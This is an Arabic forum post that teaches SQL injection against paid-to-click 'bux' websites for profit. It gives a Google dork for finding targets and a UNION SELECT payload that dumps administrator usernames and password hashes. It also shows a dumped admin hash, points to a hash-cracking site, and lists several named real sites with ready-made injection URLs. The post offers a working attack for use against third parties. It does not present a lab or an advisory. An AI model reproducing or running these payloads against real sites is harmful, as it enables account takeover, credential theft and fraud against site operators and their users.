عرض مشاركة واحدة
قديم 03-24-2010, 03:15 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Zero
 
الصورة الرمزية Zero
 

 

 
إحصائية العضو








Zero غير متواجد حالياً

إرسال رسالة عبر MSN إلى Zero

 

 

إحصائية الترشيح

عدد النقاط : 10
Zero is on a distinguished road

.......... شرح مبسط لثغرة في مواقع ربح الاموال (اخترق و اربح بدون حدود) لوول


[align=center]بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين

لابد انك من قرائتك للعنوان عرفت عن مادا سنتحدت ادن بدون اطالة ندخل للموضوع

ندهب الى موقع البحت قوقل

www.google.co.ma

ناخد الدورك التالي

كود PHP:
inurl:"main_forum.php?cat=" 
و نحطه في مكان البحث

نلاحض المواقع الكتيرة وكلها تنتهي ب bux دا دليل على انها مواقع ربح

ناخد موقع من النتائج
انا اخترت موقع Alexaclick و نضيف ليه الاستغلال
ليصبح هكدا

كود PHP:
http://www.alexaclix.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat%28aId,0x3a,aUsername,0x3a,apassword%29,3,4,5,6,7+FROM+admins-- 
الاستغلال

كود PHP:
forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins-- 
فيعطينا النتيجة التالية
الي هي الباس و ايزر

كود PHP:
admin:d6ae89521827cb719f8cf42cdf6e79e0f26a01e3 
بس الباس هنا مشفر

لدي الحل

موقع مضمون

www.passcracking.com

ندخل للموقع دا ونضع الشفرة في المكان المخصص
ونضغط على DoIT

و نشوف التيجة ان شاء الله خير

كدا انتهينا من الشرح

و الان بعض المواقع المصابة

كود PHP:
http://www.alexaclix.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat%28aId,0x3a,aUsername,0x3a,apassword%29,3,4,5,6,7+FROM+admins--

gen3bux.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--  

bpbux.info/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins-- 
[/align]



avp lfs' geyvm td l,hru vfp hghl,hg (hojvr , hvfp f],k p],]) g,,g

   

رد مع اقتباس